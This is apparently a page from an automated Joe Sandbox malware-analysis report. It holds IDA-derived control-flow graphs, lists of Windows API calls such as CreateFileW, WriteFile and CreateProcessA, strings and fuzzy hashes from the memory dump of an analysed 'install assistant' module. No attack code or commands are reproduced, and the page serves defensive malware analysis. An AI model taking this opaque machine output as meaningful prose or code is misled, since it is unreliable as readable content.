6cc6ccd5-6cc6ccfb 6884->6890 6886->6887 6894 6cc6cdda 6886->6894 6892 6cc6ce50-6cc6ce53 6887->6892 6893 6cc6ce39-6cc6ce4b call 6cc5f9cc call 6cc5f9df 6887->6893 6896 6cc6cd9a-6cc6cda4 call 6cc647bb 6888->6896 6889->6881 6895 6cc6cd6e-6cc6cd88 ReadConsoleW 6889->6895 6890->6864 6897 6cc6ccfd-6cc6cd13 6890->6897 6905 6cc6cd90-6cc6cd96 call 6cc5f9f2 6892->6905 6906 6cc6ce59-6cc6ce5b 6892->6906 6893->6888 6901 6cc6cddd-6cc6cdef 6894->6901 6903 6cc6cd8a GetLastError 6895->6903 6904 6cc6cda9-6cc6cdb2 6895->6904 6896->6846 6897->6864 6908 6cc6cd15-6cc6cd17 6897->6908 6898->6861 6899->6888 6901->6896 6911 6cc6cdf1-6cc6cdf5 6901->6911 6903->6905 6904->6901 6905->6888 6906->6896 6908->6864 6915 6cc6cd19-6cc6cd33 6908->6915 6919 6cc6cdf7-6cc6ce07 call 6cc6cefe 6911->6919 6920 6cc6ce0e-6cc6ce19 6911->6920 6915->6864 6930 6cc6ce0a-6cc6ce0c 6919->6930 6925 6cc6ce25-6cc6ce2a call 6cc6d1b6 6920->6925 6926 6cc6ce1b call 6cc6ce83 6920->6926 6931 6cc6ce20-6cc6ce23 6925->6931 6926->6931 6930->6896 6931->6930
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                              • Instruction ID: 95eb498d23126834f8adfd521a233fe94cd868d61c7f22007d90f928b16ef090
                              • Opcode Fuzzy Hash: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                              • Instruction Fuzzy Hash: F8C11670E04249AFEF01DFAAC9C0BADBBB4BF4A318F50418AE514A7F41E7709945CB64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6933 6cc7406c-6cc7409c call 6cc744ec 6936 6cc740b7-6cc740c3 call 6cc7160c 6933->6936 6937 6cc7409e-6cc740a9 call 6cc5f9df 6933->6937 6942 6cc740c5-6cc740da call 6cc5f9df call 6cc5f9cc 6936->6942 6943 6cc740dc-6cc74125 call 6cc74457 6936->6943 6944 6cc740ab-6cc740b2 call 6cc5f9cc 6937->6944 6942->6944 6952 6cc74127-6cc74130 6943->6952 6953 6cc74192-6cc7419b GetFileType 6943->6953 6954 6cc74391-6cc74395 6944->6954 6958 6cc74167-6cc7418d GetLastError call 6cc5f9f2 6952->6958 6959 6cc74132-6cc74136 6952->6959 6955 6cc741e4-6cc741e7 6953->6955 6956 6cc7419d-6cc741ce GetLastError call 6cc5f9f2 CloseHandle 6953->6956 6962 6cc741f0-6cc741f6 6955->6962 6963 6cc741e9-6cc741ee 6955->6963 6956->6944 6970 6cc741d4-6cc741df call 6cc5f9cc 6956->6970 6958->6944 6959->6958 6964 6cc74138-6cc74165 call 6cc74457 6959->6964 6967 6cc741fa-6cc74248 call 6cc717b0 6962->6967 6968 6cc741f8 6962->6968 6963->6967 6964->6953 6964->6958 6975 6cc74267-6cc7428f call 6cc74710 6967->6975 6976 6cc7424a-6cc74256 call 6cc74666 6967->6976 6968->6967 6970->6944 6983 6cc74294-6cc742d5 6975->6983 6984 6cc74291-6cc74292 6975->6984 6976->6975 6982 6cc74258 6976->6982 6985 6cc7425a-6cc74262 call 6cc6b925 6982->6985 6986 6cc742d7-6cc742db 6983->6986 6987 6cc742f6-6cc74304 6983->6987 6984->6985 6985->6954 6986->6987 6989 6cc742dd-6cc742f1 6986->6989 6990 6cc7438f 6987->6990 6991 6cc7430a-6cc7430e 6987->6991 6989->6987 6990->6954 6991->6990 6992 6cc74310-6cc74343 CloseHandle call 6cc74457 6991->6992 6996 6cc74377-6cc7438b 6992->6996 6997 6cc74345-6cc74371 GetLastError call 6cc5f9f2 call 6cc7171f 6992->6997 6996->6990 6997->6996
                              APIs
                                • Part of subcall function 6CC74457: CreateFileW.KERNEL32(00000000,00000000,?,6CC74115,?,?,00000000,?,6CC74115,00000000,0000000C), ref: 6CC74474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC74180
                              • __dosmaperr.LIBCMT ref: 6CC74187
                              • GetFileType.KERNEL32(00000000), ref: 6CC74193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7419D
                              • __dosmaperr.LIBCMT ref: 6CC741A6
                              • CloseHandle.KERNEL32(00000000), ref: 6CC741C6
                              • CloseHandle.KERNEL32(6CC6B0D0), ref: 6CC74313
                              • GetLastError.KERNEL32 ref: 6CC74345
                              • __dosmaperr.LIBCMT ref: 6CC7434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                              • Instruction ID: b438bed974e4e02bfa46ef60451f853d93095e8451da6d3908692b3133466af5
                              • Opcode Fuzzy Hash: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                              • Instruction Fuzzy Hash: 5FA16932A045449FDF19DF78C851BAE7BB4EB07328F180289E815EF780EB359816CB61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7002 6cc2c1e0-6cc2c239 call 6cc56b70 7005 6cc2c260-6cc2c269 7002->7005 7006 6cc2c2b0-6cc2c2b5 7005->7006 7007 6cc2c26b-6cc2c270 7005->7007 7008 6cc2c330-6cc2c335 7006->7008 7009 6cc2c2b7-6cc2c2bc 7006->7009 7010 6cc2c272-6cc2c277 7007->7010 7011 6cc2c2f0-6cc2c2f5 7007->7011 7016 6cc2c33b-6cc2c340 7008->7016 7017 6cc2c489-6cc2c4b9 call 6cc5b3a0 7008->7017 7012 6cc2c2c2-6cc2c2c7 7009->7012 7013 6cc2c407-6cc2c41b 7009->7013 7018 6cc2c372-6cc2c3df WriteFile 7010->7018 7019 6cc2c27d-6cc2c282 7010->7019 7014 6cc2c431-6cc2c448 WriteFile 7011->7014 7015 6cc2c2fb-6cc2c300 7011->7015 7023 6cc2c23b-6cc2c250 7012->7023 7024 6cc2c2cd-6cc2c2d2 7012->7024 7022 6cc2c41f-6cc2c42c 7013->7022 7025 6cc2c452-6cc2c47f call 6cc5b920 ReadFile 7014->7025 7015->7025 7026 6cc2c306-6cc2c30b 7015->7026 7028 6cc2c346-6cc2c36d 7016->7028 7029 6cc2c4be-6cc2c4c3 7016->7029 7017->7005 7021 6cc2c3e9-6cc2c3fd WriteFile 7018->7021 7020 6cc2c288-6cc2c28d 7019->7020 7019->7021 7020->7005 7030 6cc2c28f-6cc2c2aa 7020->7030 7021->7013 7022->7005 7034 6cc2c253-6cc2c258 7023->7034 7024->7005 7031 6cc2c2d4-6cc2c2e7 7024->7031 7025->7017 7026->7005 7033 6cc2c311-6cc2c32b 7026->7033 7028->7034 7029->7005 7036 6cc2c4c9-6cc2c4d7 7029->7036 7030->7034 7031->7034 7033->7022 7034->7005
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                              • Instruction ID: b2a247bb0735d1ffb2a4393c01af9b5ace0a971587068865973efcaf29b040f4
                              • Opcode Fuzzy Hash: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                              • Instruction Fuzzy Hash: 25716CB0208345AFE710DF55C880BABBBF4FF8A708F10492EF498D6651E775D8589B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                              • Instruction ID: a44e052a5ece2cdfafd90f17ebf65e2684f10258098b36820e032a32bc644f89
                              • Opcode Fuzzy Hash: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                              • Instruction Fuzzy Hash: 064245B86093428FD754CF19C0A0A5ABBE1AFC9314F248D1EE5E6C7B21E638D845CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                              • Instruction ID: 31a5a95c3efa9f2711f1ac14222f42e539cd1ad957b0f9bb1191c0d9416b5f0c
                              • Opcode Fuzzy Hash: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                              • Instruction Fuzzy Hash: 2303D471645B018FC728CF28C8D0695B7E3EFD532471D8B6DC0AA4BA95DB74B48ACB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7579 6cc54ff0-6cc55077 CreateProcessA 7580 6cc550ca-6cc550d3 7579->7580 7581 6cc550d5-6cc550da 7580->7581 7582 6cc550f0-6cc5510b 7580->7582 7583 6cc55080-6cc550c2 WaitForSingleObject CloseHandle * 2 7581->7583 7584 6cc550dc-6cc550e1 7581->7584 7582->7580 7583->7580 7584->7580 7585 6cc550e3-6cc55118 7584->7585
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                              • Instruction ID: 86b314e4bb4218fa762bbd67af1dcab7ee8a835b9abd496f1f7d122ed4197100
                              • Opcode Fuzzy Hash: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                              • Instruction Fuzzy Hash: D63103708193408FE740DF29C19872ABBF0EB9A318F805A1DF4D986250E775D5A9CF47

                              Control-flow Graph
                              • Rendered graph not preserved (legend: Executed / Not Executed). Recoverable data: function spans 6cc6bc5e-6cc6be3f; block 6cc6bd95-6cc6bdb7 calls WriteFile and block 6cc6bdb9-6cc6bdbf calls GetLastError; internal calls to 6cc5f9cc, 6cc5f9df, 6cc5f9f2, 6cc60120, 6cc6ac69, 6cc6be40, 6cc6beb1, 6cc6c25b, 6cc6c2c3, 6cc6c39e and 6cc6c487.
                              APIs
                                • Part of subcall function 6CC6BEB1: GetConsoleCP.KERNEL32(?,6CC6B0D0,?), ref: 6CC6BEF9
                              • WriteFile.KERNEL32(?,?,6CC746EC,00000000,00000000,?,00000000,00000000,6CC75AB6,00000000,00000000,?,00000000,6CC6B0D0,6CC746EC,00000000), ref: 6CC6BDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC6BDB9
                              • __dosmaperr.LIBCMT ref: 6CC6BDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                              • Instruction ID: 7dd5b6805bea58a1330e6b1318cde70ca794635fa8c5c2f5ff69371e37da7e83
                              • Opcode Fuzzy Hash: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                              • Instruction Fuzzy Hash: A451B371A00609AFEB019FA6CAD0BEEBB79EF06318F540491F600ABE51F730994597A1

                              Control-flow Graph
                              • Rendered graph not preserved (legend: Executed / Not Executed). Recoverable data: function spans 6cc55b90-6cc55d49; no direct API calls appear in the graph; internal calls to 6cb1e010, 6cb201f0, 6cb22250, 6cb22340, 6cc57088, 6cc59379 and 6cc60b18.
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55D31
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                              • Instruction ID: 5eedbe1030bd1a6520c993e28e09f0f3d340d362c541e86e47cb939fc829aea2
                              • Opcode Fuzzy Hash: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                              • Instruction Fuzzy Hash: 1F5133B5901B408FD725CF29C485BA7BBF1FB48318F408A6DD8864BB90E775B919CB90

                              Control-flow Graph
                              • Rendered graph not preserved (legend: Executed / Not Executed). Recoverable data: function spans 6cc6b925-6cc6b9c0; block 6cc6b973-6cc6b983 calls CloseHandle and block 6cc6b985-6cc6b98b calls GetLastError; internal calls to 6cc5f9f2, 6cc7171f and 6cc715a2.
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC7425F), ref: 6CC6B97B
                              • GetLastError.KERNEL32(?,00000000,?,6CC7425F), ref: 6CC6B985
                              • __dosmaperr.LIBCMT ref: 6CC6B9B0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                              • Instruction ID: 37634b799899b17af7265afe1f55f15634a9e69a34b6d9501c899387fe916815
                              • Opcode Fuzzy Hash: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                              • Instruction Fuzzy Hash: 4E010833A455201AD215063F96B57AE7BB99F83B3CF290259F91B97EC0FB60C8459260

                              Control-flow Graph
                              • Rendered graph not preserved (legend: Executed / Not Executed). Recoverable data: function spans 6cc60b9c-6cc60c12; no direct API calls appear in the graph; internal calls to 6cc5f9cc, 6cc60120, 6cc60cb9, 6cc647bb, 6cc6873e, 6cc69c60, 6cc6ae75 and 6cc6b898.
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 255065eed86daa86ad1437724702a7dda79d75404a9f95ae480282aa1aaf5bb9
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: AFF0F932901A547AC6211A3B8F80BCB33989F8237CF100715E961A3ED0FB71D449C7AA
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AF4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                              • Instruction ID: 3744d6ea5a68e533d5dfffc8e520dd527278eca1211e4e23af249a22854736c2
                              • Opcode Fuzzy Hash: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                              • Instruction Fuzzy Hash: 56515871601B40DBD725CF25C485BE6BBF4FB04718F848A1CE4AA4BBA1EB34B559CB84
                              APIs
                              • GetLastError.KERNEL32(6CC86DD8,0000000C), ref: 6CC5EF52
                              • ExitThread.KERNEL32 ref: 6CC5EF59
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: b5b4a8d90974bbc4207b0b175733afffa7e33e0338cfd14be0fbdcfb99a2d4fc
                              • Instruction ID: 5f98a3d28d530680d5a94486f63429f6a60c1b3e5f72f1967f26f7bf7017be05
                              • Opcode Fuzzy Hash: b5b4a8d90974bbc4207b0b175733afffa7e33e0338cfd14be0fbdcfb99a2d4fc
                              • Instruction Fuzzy Hash: 48F0C271A10600AFDB00DBB1C449AAE3B78FF42219F544289E00697B41FF355925CB91
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 58c269a236040e275d47c4b0a5fe2560cd1562607ae4c5f674325a2ad342db78
                              • Instruction ID: 580fc5439ac059497f0d213fa1f712bbc1565ea682752875b60e4c2b3c25cb22
                              • Opcode Fuzzy Hash: 58c269a236040e275d47c4b0a5fe2560cd1562607ae4c5f674325a2ad342db78
                              • Instruction Fuzzy Hash: 6A118C71A0420EAFCF05CF59E945A9B3BF8EF48308F044059F808EB301E631E921DBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: a05d8d777258b9cd599591cd82b689a9bd916489b0ab1b3382e1d88b45c7ba8e
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
